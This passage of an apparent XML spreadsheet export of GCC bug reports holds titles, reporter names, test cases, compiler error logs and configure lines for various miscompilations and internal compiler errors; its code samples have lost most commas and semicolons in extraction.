3.0.3
Environment:
System: Linux bifrost 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0.3/configure --enable-threads --prefix=/usr/local/gcc_3_0_3/install</t>
  </si>
  <si>
    <t>bergur</t>
  </si>
  <si>
    <t>GCC-337</t>
  </si>
  <si>
    <t>Illegal %sp offset on Solaris 8</t>
  </si>
  <si>
    <t>When the flags
  -mcpu=ultrasparc -O -funroll-loops
are used gcc generates invalid code for the printf()
statement in the attached file.
It generates 
  std %f6[%sp+0x5c]
which causes a segmentation fault because of the bad
alignment.
This only happens if the printf() has at least 3 double
parameters after the string parameter.
Release:
gcc 2.95.2
Environment:
Sun Ultra 5/400
Solaris 8
gcc 2.95.2</t>
  </si>
  <si>
    <t>chr.breitkopf</t>
  </si>
  <si>
    <t>GCC-20206</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] COMDAT broken for C++ thunks</t>
  </si>
  <si>
    <t>The following testcase fails to link on targets that have
TARGET_USE_LOCAL_THUNK_ALIAS_P(DECL) nonzero.
// { dg-do run }
// { dg-options -O0 }
void
bar (int x)
{
  asm ( : : g (x))
}
struct S { S () {} virtual ~S () {} }
struct T { virtual void foo (int) = 0 }
struct U : public S public T
{
  bool a
  U () {}
  virtual ~U () {}
  virtual void foo (int x)
  {
    switch (x)
      {
      case 12:
        break
      case 9:
        bar (7)
        break
      case 10:
        bar (12)
        break
      case 4:
        bar (18)
        break
      case 2:
        bar (26)
        break
      }
  }
}
U u
int
main ()
{
}
g++4 -o thunk2{.C}
/tmp/ccWXeK5j.s: Assembler messages:
/tmp/ccWXeK5j.s:647: Error: can't resolve `.gnu.linkonce.t._ZN1U3fooEi'
{.gnu.linkonce.t._ZN1U3fooEi section} - `.LFB20' {.gnu.linkonce.t._ZN1U3fooEi
section}</t>
  </si>
  <si>
    <t>GCC-29775</t>
  </si>
  <si>
    <t>redundant movzbl</t>
  </si>
  <si>
    <t>in the following code the compiler zero-extends the same byte twice... there's something about using byte0 in an if () statement which triggers this -- if you comment out the if() the problem goes away.
-dean
% cat redundant_movzbl.c
unsigned foo(unsigned char *p)
{
  unsigned byte0 = *p
  unsigned len = __builtin_ctz(byte0) + 1
  if (byte0 == 0) return 0
  return len
}
% ~/gcc/bin/gcc -g -O3 -Wall -c redundant_movzbl.c
% objdump -dr redundant_movzbl.o
redundant_movzbl.o:     file format elf64-x86-64
Disassembly of section .text:
0000000000000000 :
   0:   0f b6 07                movzbl (%rdi)%eax
   3:   31 d2                   xor    %edx%edx
   5:   84 c0                   test   %al%al
   7:   74 09                   je     12 
   9:   0f b6 c0                movzbl %al%eax
   c:   0f bc c0                bsf    %eax%eax
   f:   8d 50 01                lea    0x1(%rax)%edx
  12:   89 d0                   mov    %edx%eax
  14:   c3                      retq
% ~/gcc/bin/gcc -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc/configure --prefix=/home/odo/gcc --enable-languages=c --enable-targets=x86_64-unknown-linux-gnu x86_64-unknown-linux-gnu : (reconfigured) ../gcc/configure --prefix=/home/odo/gcc --enable-languages=c --without-mudflap --disable-biarch x86_64-unknown-linux-gnu : (reconfigured) ../gcc/configure --prefix=/home/odo/gcc --enable-languages=c --disable-multilib --disable-biarch x86_64-unknown-linux-gnu
Thread model: posix
gcc version 4.3.0 20061104 (experimental)</t>
  </si>
  <si>
    <t>GCC-67355</t>
  </si>
  <si>
    <t>[5 Regression] ICE compiling LTP testcase endless cselib recursion from var-tracking</t>
  </si>
  <si>
    <t>Created attachment 36256
testcase
&gt; gcc-5 -S -O2 -D_FORTIFY_SOURCE=2 -fstack-protector -funwind-tables -fasynchronous-unwind-tables atof01.c -m32 -g -B /abuild/rguenther/gcc5-g/gcc -v 
Reading specs from /abuild/rguenther/gcc5-g/gcc/specs
COLLECT_GCC=gcc-5
Target: x86_64-suse-linux
Configured with: ../configure --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64 --enable-languages=cc++objcfortranobj-c++javaadago --enable-checking=release --with-gxx-include-dir=/usr/include/c++/5 --enable-ssp --disable-libssp --disable-libvtv --enable-libmpx --disable-plugin --with-bugurl=http://bugs.opensuse.org/ --with-pkgversion='SUSE Linux' --disable-libgcj --with-slibdir=/lib64 --with-system-zlib --enable-__cxa_atexit --enable-libstdcxx-allocator=new --disable-libstdcxx-pch --with-default-libstdcxx-abi=gcc4-compatible --enable-version-specific-runtime-libs --enable-linker-build-id --enable-linux-futex --program-suffix=-5 --without-system-libunwind --enable-multilib --with-arch-32=i586 --with-tune=generic --build=x86_64-suse-linux --host=x86_64-suse-linux
Thread model: posix
gcc version 5.1.1 20150707 [gcc-5-branch revision 225501] (SUSE Linux) 
COLLECT_GCC_OPTIONS='-S' '-O2' '-D' '_FORTIFY_SOURCE=2' '-fstack-protector' '-funwind-tables' '-fasynchronous-unwind-tables' '-m32' '-g' '-B' '/abuild/rguenther/gcc5-g/gcc' '-v' '-mtune=generic' '-march=i586'
 /abuild/rguenther/gcc5-g/gcc/cc1 -quiet -v -imultilib 32 -isystem /abuild/rguenther/gcc5-g/gcc/include -isystem /abuild/rguenther/gcc5-g/gcc/include-fixed -D _FORTIFY_SOURCE=2 atof01.c -quiet -dumpbase atof01.c -m32 -mtune=generic -march=i586 -auxbase atof01 -g -O2 -version -fstack-protector -funwind-tables -fasynchronous-unwind-tables -o atof01.s
GNU C11 (GCC) version 5.2.1 20150826 [gcc-5-branch revision 226027] (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.8.4 20150327 [gcc-4_8-branch revision 221722] GMP version 6.0.0 MPFR version 3.1.2 MPC version 1.0.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
ignoring nonexistent directory /usr/local/lib64/gcc/x86_64-unknown-linux-gnu/5.2.1/include
ignoring nonexistent directory /usr/local/lib64/gcc/x86_64-unknown-linux-gnu/5.2.1/include-fixed
ignoring nonexistent directory /usr/local/lib64/../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /abuild/rguenther/gcc5-g/gcc/include
 /abuild/rguenther/gcc5-g/gcc/include-fixed
 /usr/local/include
 /usr/include
End of search list.
GNU C11 (GCC) version 5.2.1 20150826 [gcc-5-branch revision 226027] (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.8.4 20150327 [gcc-4_8-branch revision 221722] GMP version 6.0.0 MPFR version 3.1.2 MPC version 1.0.2
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: eb89c9d8d76c5ea91abc0b0f9363b11c
gcc-5: internal compiler error: Segmentation fault (program cc1)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-3093</t>
  </si>
  <si>
    <t>gcj doesn't not finish building when the  --enable-java-awt=xlib option is set</t>
  </si>
  <si>
    <t xml:space="preserve">	Compiling gcc with the following config
../gcc/configure --host=i686-pc-linux-gnu --prefix=/usr/local/gcc-3.0-alpha --enable-shared --enable-threads=posix --enable-version-specific-runtime-libs --enable-java-awt=xlib --enable-languages=cc++java
        Causes gcj build to fail with the following error log.
mkdir gnu/gcj/xlib/.libs
/local/GCC/build/gcc/g++ -B/local/GCC/build/gcc/ -nostdinc++ -nostdinc++ -I/local/GCC/build/i686-pc-linux-gnu/libstdc++-v3/include -I/
local/GCC/gcc/libstdc++-v3/include -I/local/GCC/gcc/libstdc++-v3/include/std -I/local/GCC/gcc/libstdc++-v3/include/c_std -I/local/GCC/
gcc/libstdc++-v3/libsupc++ -I/local/GCC/gcc/libstdc++-v3/libio -I/local/GCC/gcc/libstdc++-v3/testsuite -I/local/GCC/gcc/libstdc++-v3/i
nclude/backwards -I/local/GCC/gcc/libstdc++-v3/include/ext -L/local/GCC/build/i686-pc-linux-gnu/libstdc++-v3/src -L/local/GCC/build/i6
86-pc-linux-gnu/libstdc++-v3/src/.libs -B/usr/local/gcc-3.0-alpha/i686-pc-linux-gnu/bin/ -B/usr/local/gcc-3.0-alpha/i686-pc-linux-gnu/
lib/ -isystem /usr/local/gcc-3.0-alpha/i686-pc-linux-gnu/include -DHAVE_CONFIG_H -I. -I../../../gcc/libjava -I./include -I../../../gcc
/libjava -Iinclude -I../../../gcc/libjava/include -I../../../gcc/libjava/../boehm-gc -I./../boehm-gc -DLINUX_THREADS=1 -D_REENTRANT=1 
-DSILENT=1 -DNO_SIGNALS=1 -DJAVA_FINALIZATION=1 -DGC_GCJ_SUPPORT=1 -I../../../gcc/libjava/libltdl -I../../../gcc/libjava/libltdl -I../
../../gcc/libjava/../gcc -I../../../gcc/libjava/../zlib -I../../../gcc/libjava/../libffi/include -I../libffi/include -fno-rtti -fnon-c
all-exceptions -fdollars-in-identifiers -D__NO_MATH_INLINES -ffloat-store -I/usr/X11R6/include -W -Wall -D_GNU_SOURCE -g -O2 -D_GNU_SO
URCE -Wp-MD.deps/natClip.pp -c ../../../gcc/libjava/gnu/gcj/xlib/natClip.cc  -fPIC -DPIC -o gnu/gcj/xlib/.libs/natClip.o
In file included from ../../../gcc/libjava/gnu/gcj/xlib/natClip.cc:18:
../../../gcc/libjava/gcj/cni.h: In function `java::lang::String* 
   JvNewStringLatin1(const char*)':
../../../gcc/libjava/gcj/cni.h:65: `strlen' undeclared (first use this 
   function)
../../../gcc/libjava/gcj/cni.h:65: (Each undeclared identifier is reported only 
   once for each function it appears in.)
make[3]: *** [gnu/gcj/xlib/natClip.lo] Error 1
make[3]: Leaving directory `/local/GCC/build/i686-pc-linux-gnu/libjava'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/local/GCC/build/i686-pc-linux-gnu/libjava'
make[1]: *** [all-target-libjava] Error 2
make[1]: Leaving directory `/local/GCC/build'
make: *** [bootstrap] Error 2
Release:
3.0 20010608 (prerelease)
Environment:
System: Linux panic 2.2.12-20 #1 Mon Sep 27 10:40:35 EDT 1999 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --host=i686-pc-linux-gnu --prefix=/usr/local/gcc-3.0-alpha --enable-shared --enable-threads=posix --enable-version-specific-runtime-libs --enable-languages=cc++java
How-To-Repeat:
	compile system with  the option --enable-java-awt=xlib</t>
  </si>
  <si>
    <t>awk</t>
  </si>
  <si>
    <t>GCC-11729</t>
  </si>
  <si>
    <t>[DR280] no operator!= for const_reverse_iterator</t>
  </si>
  <si>
    <t>operator!= is missed for const_reverse_iterator (I've tried `map' and `multimap'
classes). Compiling the code below produces an error:
bug_ne.cpp: In function `int main()':
bug_ne.cpp:12: error: no match for 'operator!=' in 'ri != std::map&lt;_Key _Tp
   _Compare _Alloc&gt;::rend() [with _Key = int _Tp = int _Compare =
   std::less _Alloc = std::allocator &gt;]()'
///// cut_here //////
#include 
#include 
using namespace std
typedef map M
int main() {
    M m
    m[0] = 0
    for(M::const_reverse_iterator ri=m.rbegin()ri!=m.rend()++ri)
        cout first second &lt;&lt; endl
    return 0
}
///// cut_here //////</t>
  </si>
  <si>
    <t>relf</t>
  </si>
  <si>
    <t>GCC-16325</t>
  </si>
  <si>
    <t>value profiling clobbers gp on mips</t>
  </si>
  <si>
    <t>A customer reported that compiling SPEC95 using FDO (i.e. -fprofile-generate and
-fprofile-use) and -mabi=32 causes 146.wave5 to fail.  I don't think I can
distribute SPEC95 sources but I have managed to create a small C testcase which
I will attach.
The problem here is a bit involved and depends on several aspects of the MIPS ABI.
The value profiling code is enabled by -fprofile-generate.  This code
instruments divides by registers to check for cases where we are always
dividing by the same value.  Such cases can be optimized to use constant divides
instead.  This code emits DImode comparisons.  For a 32-bit MIPS target this
means a cmpdi2 libcall.  If you have a divide inside a leaf function it will no
longer be a leaf function after profile.c runs.  This happens after virtual
register instantiation and before reload.
On the MIPS the ABI traditionally makes the FP equal to the SP immediately
after the prologue.  Thus STARTING_FRAME_OFFSET includes the size of the
outgoing args and space for the gp save area.  In this case during virtual
register elimination current_function_outgoing_args_size is 0 so the local
variables are placed at offset 8 (4 bytes for gp save area 4 bytes for stack
alignment).
When we get to reload current_function_outgoing_args_size is now 16.  This is
because cmpdi2 needs 16 bytes of arguments and ABI32 allocates stack space for
arguments in registers.  INITIAL_ELIMINATION_OFFSET defines the offset between
the fp and sp as zero.  The FP gets eliminated and now the local args start at
sp+8.  Meanwhile compute_frame_size sees that we have 16 bytes of outgoing
args so the gp save area is placed at sp+16.
We now have the problem that the local args area overlaps the gp save area.  If
you store to a local arg that overlaps the gp save area call a function and
then restore gp after the function returns then the gp is clobbered.  The next
use of the gp results in a bus error/segmentation fault or similar problem.
If we want the ability to make libcalls in leaf functions then it seems to me
that this is a flaw in the MIPS ABI.  We can't eliminate the FP to be the same
as the SP.  At best we can make the FP be SP+outgoing args size.  This implies
that we remove current_function_outgoing_args_size from STARTING_FRAME_OFFSET
and add it to INITIAL_ELIMINATION_OFFSET.  However this is effectively an ABI
change.  This will perhaps effect EH info debugging info debuggers (that
disassemble prologues) asms that make assumptions about FP values and perhaps
other things.  It isn't clear that this change is safe or desirable.
An alternative solution is to eliminate the cmpdi2 libcalls.  One way to do this
is to modify mips.md to add a 32-bit cmpdi2 pattern.  I believe this can be done
in 8 instructions 4 for a subtract and 4 to reduce the result to -1/0/1.  This
is a bit large for a define_expand/define_insn though.  It isn't clear if this
is desirable.
Another way to eliminate the libcalls would be to change gcov_type from DImode
to SImode.  However this potentially causes compatibility problems as it will
change the format of some profiling files.  There are potential cross
compilation problems.  This overrides a deliberate decision by the profile
maintainers to use DImode to avoid overflowing SImode counters.  It isn't clear
that this is desirable.
Another solution is to just add extra bytes to leaf function stack frames when
profiling.  This isn't very elegant but seems like the simplest and safest
solution I can come up with.  Since profiled code will already be slow wasting
a few bytes of stack space should not be an issue.  If we always assume that a
leaf function has 16 bytes of stack space then the resulting code will still
work if a cmpdi2 libcall is emitted.  This is potentially fragile as it assumes
the profiling code will never emit a libcall that uses more than 16 bytes of
stack space but then I already said this was inelegant.  I will attach a patch
for this.  This works for the testcase.  I will be testing this against SPEC95
to make sure it works for all cases.</t>
  </si>
  <si>
    <t>wilson</t>
  </si>
  <si>
    <t>GCC-32362</t>
  </si>
  <si>
    <t>ICE: in lookup_decl_in_outer_ctx at omp-low.c:1508</t>
  </si>
  <si>
    <t>Description:
This test case derived from OpenMP test omp1/F2_2_9h.f90 involves nested
parallel loops.  The gfortran compiler currently aborts with an internal
error for this code.
&gt; gfortran -v
Using built-in specs.
Target: x86_64-suse-linux
Configured with: ../xt-gcc-4.2.0/configure --prefix=/opt/gcc/4.2.0/snos --disable-nls --libdir=/opt/gcc/4.2.0/snos/lib --enable-languages=cc++fortran --with-gxx-include-dir=/opt/gcc/4.2.0/snos/include/g++ --with-slibdir=/opt/gcc/4.2.0/snos/lib --with-system-zlib --enable-shared --enable-__cxa_atexit x86_64-suse-linux
Thread model: posix
gcc version 4.2.0 20070514 (rpm:4)
&gt; cat bug2830.f90
! Derived from OpenMP test omp1/F2_2_9h.f90
      use omp_lib
      implicit none
      integer parameter :: NT = 4
      integer :: nThreads(NT)
      integer :: i tmp = 1 itmp = 0
!$    call omp_set_dynamic(.false.)
!$    call omp_set_num_threads(NT)
      do i = 1 NT
          nThreads(i) = 0
      enddo
!$omp parallel private(itmp)
      itmp = omp_get_thread_num() + 1
!$omp parallel firstprivate(tmp)
      tmp = tmp + omp_get_thread_num() + 1
!$omp atomic
      nThreads(itmp) = nThreads(itmp)+tmp
!$omp end parallel
!$omp end parallel
      print * nThreads
      END
&gt; ftn -fopenmp -c bug2830.f90
/opt/xt-pe/2.1/bin/snos64/ftn: INFO: linux target is being used
bug2830.f90: In function 'MAIN__':
bug2830.f90:16: internal compiler error: in lookup_decl_in_outer_ctx at
omp-low.c:1508
Please submit a full bug report
with preprocessed source if appropriate.
------
Note: ftn is an alias for:
/opt/gcc/4.2.0/bin/../snos/bin/gfortran -static -v -I/opt/xt-mpt/2.1/mpich2-64/GP/include -I/opt/xt-mpt/2.1/mpich2-64/GP/include -L/opt/xt-mpt/2.1/mpich2-64/GP/lib -I/opt/acml/3.6.1/gnu64/include -I/opt/xt-libsci/10.1.0/gnu/snos64/include -I/opt/xt-libsci/10.1.0/gnu/snos64/include/superlu -I/opt/xt-mpt/2.1/sma/P/include -L/opt/acml/3.6.1/gnu64/lib -L/opt/xt-libsci/10.1.0/gnu/snos64/lib -L/opt/xt-mpt/2.1/sma/P/lib -lmpichf90 -lsci -lacml -lsma -lmpichf90 -lmpich -lrt -D__CRAYXT_COMPUTE_LINUX_TARGET -D__TARGET_LINUX__ -fno-second-underscore -I/notbackedup/users/rsrel/rs64.DEV.070604.Mon/install/include -I/opt/xt-catamount/2.1/catamount/linux/include -I/opt/xt-service/2.1/include -L/notbackedup/users/rsrel/rs64.DEV.070604.Mon/install/lib/snos64 -L/opt/xt-pe/2.1/cnos/linux/64/lib -L/opt/xt-mpt/2.1/lib/snos64 -L/opt/xt-service/2.1/lib/snos64 -Wl--start -lpct -lalpslli -lalpsutil -lportals -lpthread -Wl--end -lgfortranbegin -lgfortran -lm</t>
  </si>
  <si>
    <t>GCC-12941</t>
  </si>
  <si>
    <t>[tree-ssa] builtin-bitops-1.c miscompilation</t>
  </si>
  <si>
    <t>This makes builtin-bitops-1.c fail at -O3. Test case:
int main (void)
{
  unsigned long long x
  int i
  x = 2
  for (i = 0 i &lt; 64 i++)
    if (x &amp; (1ULL &lt;&lt; (64 - i - 1)))
      break
  x = 4
  for (i = 0 i &lt; 64 i++)
    if (x &amp; (1ULL &lt;&lt; (64 - i - 1)))
      break
  if (i != 61)
    abort ()
  return 0
}
This aborts at -O and higher.
version: 3.5-tree-ssa 20031106</t>
  </si>
  <si>
    <t>GCC-35439</t>
  </si>
  <si>
    <t>ICE using threadprivate for broken variable</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.2.0 when
compiled with -fopenmp:
================================
void x[1]
#pragma omp threadprivate(x)
================================
bug.c:1: error: declaration of 'x' as array of voids
bug.c:2: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in c_parser_omp_threadprivate at c-parser.c:7971
Please submit a full bug report [etc.]
Related to PR35428.</t>
  </si>
  <si>
    <t>GCC-81186</t>
  </si>
  <si>
    <t>SIGSEGV when using Address Sanitizer with nested functions</t>
  </si>
  <si>
    <t>gcc version 7.1.0 (Debian 7.1.0-7)
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 7.1.0-7' --with-bugurl=file:///usr/share/doc/gcc-7/README.Bugs --enable-languages=cadac++gobrigdfortranobjcobj-c++ --prefix=/usr --with-gcc-major-version-only --program-suffix=-7 --program-prefix=x86_64-linux-gnu- --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --enable-default-pie --with-system-zlib --with-target-system-zlib --enable-objc-gc=auto --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-offload-targets=nvptx-none --without-cuda-driver --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Program:
    int main() {
        __label__ l
        void f() {
            goto l
        }
    l:
        return 0
    }
Commands:
    $ gcc -fsanitize=address -o test test.c
    $ ./test
    ASAN:DEADLYSIGNAL
    =================================================================
    ==4734==ERROR: AddressSanitizer: SEGV on unknown address 0x564cfe0a887a (pc 0x564cfe0a88d2 bp 0x7ffc4f3a68b0 sp 0x7ffc4f3a6800 T0)
    ==4734==The signal is caused by a WRITE memory access.
        #0 0x564cfe0a88d1 in main (/path/to/test+0x8d1)
        #1 0x7faed07412b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
        #2 0x564cfe0a87d9 in _start (/path/to/test+0x7d9)
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/path/to/test+0x8d1) in main
    ==4734==ABORTING
With GCC 6 this code works fine.</t>
  </si>
  <si>
    <t>abacabadabacaba</t>
  </si>
  <si>
    <t>GCC-50412</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] gfortran -Ofast ICE in vect_do_peeling_for_loop_bound</t>
  </si>
  <si>
    <t>Created attachment 25288
please compile it with -Ofast
gfortran -Ofast ICE in vect_do_peeling_for_loop_bound</t>
  </si>
  <si>
    <t>GCC-11122</t>
  </si>
  <si>
    <t>gcc: Internal error: Illegal instruction (program cc1) on GSL 1.3 cblas/test_rotg.c</t>
  </si>
  <si>
    <t>gcc -v sayeth:
Reading specs from /usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/specs
Configured with: ../gcc-3.3/configure --prefix=/usr/gcc/gcc-3.3
Thread model: single
gcc version 3.3
The command line is:
gcc -DHAVE_CONFIG_H -I. -I. -I.. -I..    -g -O2 -c test_rotg.c
(the directory is gsl-1.3/cblas - the GNU Scientific Library).
The build output is:
gcc -DHAVE_CONFIG_H -I. -I. -I.. -I..    -g -O2 -c test_rotg.c
gcc: Internal error: Illegal instruction (program cc1)
Please submit a full bug report.
See  for instructions.
make[2]: *** [test_rotg.o] Error 1
Adding -Wall to the compilation did not change the output.
Comment: GCC 3.3 compiled without problem (Thank you very much) whereas prior
versions had given much grief on MacOS X.
Here is the file test_rotg.i (cut'n'paste - 100511 characters in original
chopped because Bugzilla only allows 64K comments):
# 1 test_rotg.c
# 1 
# 1 
# 1 test_rotg.c
# 1 ../gsl/gsl_test.h 1
# 33 ../gsl/gsl_test.h
void
  gsl_test (int status const char *test_description ...)
void
gsl_test_rel (double result double expected double relative_error
              const char *test_description ...) 
void
gsl_test_abs (double result double expected double absolute_error
              const char *test_description ...) 
void
gsl_test_factor (double result double expected double factor
                 const char *test_description ...) 
void
gsl_test_int (int result int expected const char *test_description ...) 
void
gsl_test_str (const char * result const char * expected
              const char *test_description ...) 
void
  gsl_test_verbose (int verbose) 
int
  gsl_test_summary (void) 
# 2 test_rotg.c 2
# 1 ../gsl/gsl_ieee_utils.h 1
# 22 ../gsl/gsl_ieee_utils.h
# 1 /usr/include/stdio.h 1 3 4
# 64 /usr/include/stdio.h 3 4
# 1
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/sys/types.h 1 3 4
# 75
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/sys/types.h 3 4
# 1 /usr/include/sys/appleapiopts.h 1 3 4
# 76
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/sys/types.h 2 3 4
# 1 /usr/include/sys/cdefs.h 1 3 4
# 79
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/sys/types.h 2 3 4
# 1 /usr/include/machine/types.h 1 3 4
# 30 /usr/include/machine/types.h 3 4
# 1 /usr/include/ppc/types.h 1 3 4
# 69 /usr/include/ppc/types.h 3 4
typedef signed char int8_t
typedef unsigned char u_int8_t
typedef short int16_t
typedef unsigned short u_int16_t
typedef int int32_t
typedef unsigned int u_int32_t
typedef long long int64_t
typedef unsigned long long u_int64_t
typedef int32_t register_t
typedef long int intptr_t
typedef unsigned long int uintptr_t
# 31 /usr/include/machine/types.h 2 3 4
# 82
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/sys/types.h 2 3 4
# 1 /usr/include/machine/ansi.h 1 3 4
# 33 /usr/include/machine/ansi.h 3 4
# 1 /usr/include/ppc/ansi.h 1 3 4
# 92 /usr/include/ppc/ansi.h 3 4
typedef union {
        char __mbstate8[128]
        long long _mbstateL
} __mbstate_t
# 34 /usr/include/machine/ansi.h 2 3 4
# 84
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/sys/types.h 2 3 4
# 1 /usr/include/machine/endian.h 1 3 4
# 30 /usr/include/machine/endian.h 3 4
# 1 /usr/include/ppc/endian.h 1 3 4
# 81 /usr/include/ppc/endian.h 3 4
unsigned long htonl (unsigned long)
unsigned short htons (unsigned short)
unsigned long ntohl (unsigned long)
unsigned short ntohs (unsigned short)
# 31 /usr/include/machine/endian.h 2 3 4
# 85
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/sys/types.h 2 3 4
typedef unsigned char u_char
typedef unsigned short u_short
typedef unsigned int u_int
typedef unsigned long u_long
typedef unsigned short ushort
typedef unsigned int uint
typedef u_int64_t u_quad_t
typedef int64_t quad_t
typedef quad_t * qaddr_t
typedef char * caddr_t
typedef int32_t daddr_t
typedef int32_t dev_t
typedef u_int32_t fixpt_t
typedef u_int32_t gid_t
typedef u_int32_t in_addr_t
typedef u_int16_t in_port_t
typedef u_int32_t ino_t
typedef long key_t
typedef u_int16_t mode_t
typedef u_int16_t nlink_t
typedef quad_t off_t
typedef int32_t pid_t
typedef quad_t rlim_t
typedef int32_t segsz_t
typedef int32_t swblk_t
typedef u_int32_t uid_t
# 126
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/sys/types.h 3 4
typedef unsigned long clock_t
typedef long unsigned int size_t
typedef int ssize_t
typedef long time_t
# 159
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/sys/types.h 3 4
typedef int32_t fd_mask
typedef struct fd_set {
        fd_mask fds_bits[(((1024) + (((sizeof(fd_mask) * 8)) - 1)) /
((sizeof(fd_mask) * 8)))]
} fd_set
# 195
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/sys/types.h 3 4
struct _pthread_handler_rec
{
        void (*routine)(void *)
        void *arg
        struct _pthread_handler_rec *next
}
# 215
/usr/gcc/gcc-3.3/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include/sys/types.h 3 4
typedef struct _opaque_pthread_t { long sig struct _pthread_handler_rec
*cleanup_stack char opaque[596]} *pthread_t
typedef struct _opaque_pthread_attr_t { long sig char opaque[36] } pthread_attr_t
typedef struct _opaque_pthread_mutexattr_t { long sig char opaque[8] }
pthread_mutexattr_t
typedef struct _opaque_pthread_mutex_t { long sig char opaque[40] }
pthread_mutex_t
typedef struct _opaque_pthread_condattr_t { long sig char opaque[4] }
pthread_condattr_t
typedef struct _opaque_pthread_cond_t { long sig char opaque[24] } pthread_cond_t
typedef struct _opaque_pthread_rwlockattr_t { long sig char opaque[12] }
pthread_rwlockattr_t
typedef struct _opaque_pthread_rwlock_t { long sig char opaque[124] }
pthread_rwlock_t
typedef struct { long sig char opaque[4] } pthread_once_t
typedef unsigned long pthread_key_t
# 65 /usr/include/stdio.h 2 3 4
# 91 /usr/include/stdio.h 3 4
typedef off_t fpos_t
# 107 /usr/include/stdio.h 3 4
struct __sbuf {
        unsigned char *_base
        int _size
}
# 138 /usr/include/stdio.h 3 4
typedef struct __sFILE {
        unsigned char *_p
        int _r
        int _w
        short _flags
        short _file
        struct __sbuf _bf
        int _lbfsize
        void *_cookie
        int (*_close) (void *)
        int (*_read) (void * char * int)
        fpos_t (*_seek) (void * fpos_t int)
        int (*_write) (void * const char * int)
        struct __sbuf _ub
        unsigned char *_up
        int _ur
        unsigned char _ubuf[3]
        unsigned char _nbuf[1]
        struct __sbuf _lb
        int _blksize
        fpos_t _offset
} FILE
extern FILE __sF[]
# 241 /usr/include/stdio.h 3 4
void clearerr (FILE *)
int fclose (FILE *)
int feof (FILE *)
int ferror (FILE *)
int fflush (FILE *)
int fgetc (FILE *)
int fgetpos (FILE * fpos_t *)
char *fgets (char * int FILE *)
FILE *fopen (const char * const char *)
int fprintf (FILE * const char * ...)
int fputc (int FILE *)
int fputs (const char * FILE *)
size_t fread (void * size_t size_t FILE *)
FILE *freopen (const char * const char * FILE *)
int fscanf (FILE * const char * ...)
int fseek (FILE * long int)
int fsetpos (FILE * const fpos_t *)
long ftell (FILE *)
size_t fwrite (const void * size_t size_t FILE *)
int getc (FILE *)
int getchar (void)
char *gets (char *)
extern const int sys_nerr
extern const char *const sys_errlist[]
void perror (const char *)
int printf (const char * ...)
int putc (int FILE *)
int putchar (int)
int puts (const char *)
int remove (const char *)
int rename (const char * const char *)
void rewind (FILE *)
int scanf (const char * ...)
void setbuf (FILE * char *)
int setvbuf (FILE * char * int size_t)
int sprintf (char * const char * ...)
int sscanf (const char * const char * ...)
FILE *tmpfile (void)
char *tmpnam (char *)
int ungetc (int FILE *)
int vfprintf (FILE * const char * __builtin_va_list)
int vprintf (const char * __builtin_va_list)
int vsprintf (char * const char * __builtin_va_list)
int asprintf (char ** const char * ...)
int vasprintf (char ** const char * __builtin_va_list)
# 298 /usr/include/stdio.h 3 4
char *ctermid (char *)
FILE *fdopen (int const char *)
int fileno (FILE *)
char *fgetln (FILE * size_t *)
int fpurge (FILE *)
int fseeko (FILE * fpos_t int)
fpos_t ftello (FILE *)
int getw (FILE *)
int pclose (FILE *)
FILE *popen (const char * const char *)
int putw (int FILE *)
void setbuffer (FILE * char * int)
int setlinebuf (FILE *)
char *tempnam (const char * const char *)
int snprintf (char * size_t const char * ...)
int vsnprintf (char * size_t const char * __builtin_va_list)
int vscanf (const char * __builtin_va_list)
int vsscanf (const char * const char * __builtin_va_list)
FILE *zopen (const char * const char * int)
